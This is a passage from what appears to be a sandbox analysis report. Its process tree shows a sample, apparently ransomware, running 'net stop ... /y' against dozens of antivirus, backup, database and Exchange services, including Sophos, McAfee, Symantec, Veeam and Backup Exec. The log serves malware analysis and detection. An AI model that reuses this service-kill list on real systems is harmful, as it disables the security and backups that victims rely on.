      C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
      4⤵
      PID:2676
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Client" /y
      4⤵
      PID:2276
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
    3⤵
    PID:1532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Message Router" /y
      4⤵
      PID:1132
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
    3⤵
    PID:1520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
      4⤵
      PID:1916
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
    3⤵
    PID:4152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
      4⤵
      PID:4088
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
    3⤵
    PID:4952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
      4⤵
      PID:4824
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
    3⤵
    PID:1524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
      4⤵
      PID:1468
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
    3⤵
    PID:3344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
      4⤵
      PID:1260
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
    3⤵
    PID:1492
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Symantec System Recovery" /y
      4⤵
      PID:3160
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:4884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
      4⤵
      PID:1864
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop AcronisAgent /y
    3⤵
    PID:3056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:2980
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop AcrSch2Svc /y
    3⤵
    PID:1188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:632
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop Antivirus /y
    3⤵
    PID:904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:2528
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ARSM /y
    3⤵
    PID:3732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:2240
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:1488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:3544
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:372
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:4428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:1236
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:2524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:3676
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecManagementService /y
    3⤵
    PID:1552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:2400
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecRPCService /y
    3⤵
    PID:644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:4724
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:1676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:3416
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop bedbg /y
    3⤵
    PID:2664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:4144
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop DCAgent /y
    3⤵
    PID:4768
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:3556
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop EPSecurityService /y
    3⤵
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:4864
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop EPUpdateService /y
    3⤵
    PID:3524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:2964
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop EraserSvc11710 /y
    3⤵
    PID:3760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:508
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop EsgShKernel /y
    3⤵
    PID:3604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:3160
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop FA_Scheduler /y
    3⤵
    PID:2376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:2980
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop IISAdmin /y
    3⤵
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:1364
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop IMAP4Svc /y
    3⤵
    PID:4564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IMAP4Svc /y
      4⤵
      PID:3448
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop macmnsvc /y
    3⤵
    PID:2936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:4848
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop masvc /y
    3⤵
    PID:4000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4460
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MBAMService /y
    3⤵
    PID:2560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:2528
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MBEndpointAgent /y
    3⤵
    PID:3296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:2792
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop McAfeeEngineService /y
    3⤵
    PID:1632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:3896
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop McAfeeFramework /y
    3⤵
    PID:2736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:4356
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:1000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:2332
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop McShield /y
    3⤵
    PID:3908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:4784
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop McTaskManager /y
    3⤵
    PID:1788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:3676
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop mfemms /y
    3⤵
    PID:668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:2944
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop mfevtp /y
    3⤵
    PID:812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:3696
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MMS /y
    3⤵
    PID:2356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:2968
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop mozyprobackup /y
    3⤵
    PID:1260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:3604
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MsDtsServer /y
    3⤵
    PID:3572
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:4720
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MsDtsServer100 /y
    3⤵
    PID:2708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:1716
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MsDtsServer110 /y
    3⤵
    PID:4428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:4724
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeES /y
    3⤵
    PID:528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:1560
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeIS /y
    3⤵
    PID:2952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:4592
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:3384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:1028
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeMTA /y
    3⤵
    PID:2272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:4580
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeSA /y
    3⤵
    PID:4088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:632
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSExchangeSRS /y
    3⤵
    PID:3208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:616
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:5020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:3488
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:3160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:4508
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:3936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:3008
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:2500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:4932
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:2168
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:2052
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:2072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:2132
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:772
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:4100
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:2672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:2744
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:3508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:2560
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:3748
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:1248
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:4788
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$TPS /y
    3⤵
    PID:2776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:904
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:5008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:1664
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2752
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:3156
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1876
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
    3⤵
    PID:4320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher /y
      4⤵
      PID:1720
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:2796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:2900
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:1748
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:4012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:2104
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:3732
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:1008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:616
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:528
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:4604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:2448
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLSERVER /y
    3⤵
    PID:2524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:4060
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:1524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:3760
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:4424
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:1532
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MySQL80 /y
    3⤵
    PID:2556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:1444
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop MySQL57 /y
    3⤵
    PID:1600
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:4428
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ntrtscan /y
    3⤵
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:1000
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop OracleClientCache80 /y
    3⤵
    PID:1692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:668
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop PDVFSService /y
    3⤵
    PID:3320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:1540
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop POP3Svc /y
    3⤵
    PID:3076
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:4500
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ReportServer /y
    3⤵
    PID:704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:2292
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:4592
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:224
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:1628
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ReportServer$TPS /y
    3⤵
    PID:1400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:4472
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:1864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:3156
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop RESvc /y
    3⤵
    PID:4824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:1944
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop sacsvr /y
    3⤵
    PID:2280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:2152
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SamSs /y
    3⤵
    PID:5064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:5008
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SAVAdminService /y
    3⤵
    PID:3668
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:3272
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SAVService /y
    3⤵
    PID:1084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:4844
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SDRSVC /y
    3⤵
    PID:1248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:3160
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SepMasterService /y
    3⤵
    PID:3220
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:2176
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop ShMonitor /y
    3⤵
    PID:1648
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:4720
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop Smcinst /y
    3⤵
    PID:3796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:1028
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SmcService /y
    3⤵
    PID:1624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:668
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SMTPSvc /y
    3⤵
    PID:3608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:4508
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SNAC /y
    3⤵
    PID:4836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SNAC /y
      4⤵
      PID:2964
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SntpService /y
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:1896
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop sophossps /y
    3⤵
    PID:1436
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:3084
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:3032
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:4768
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:3448
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:2388
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:2752
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:3152
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:956
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:2904
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:2900
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:3208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:2160
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:2252
  - - C:\Windows\System32\Conhost.exe
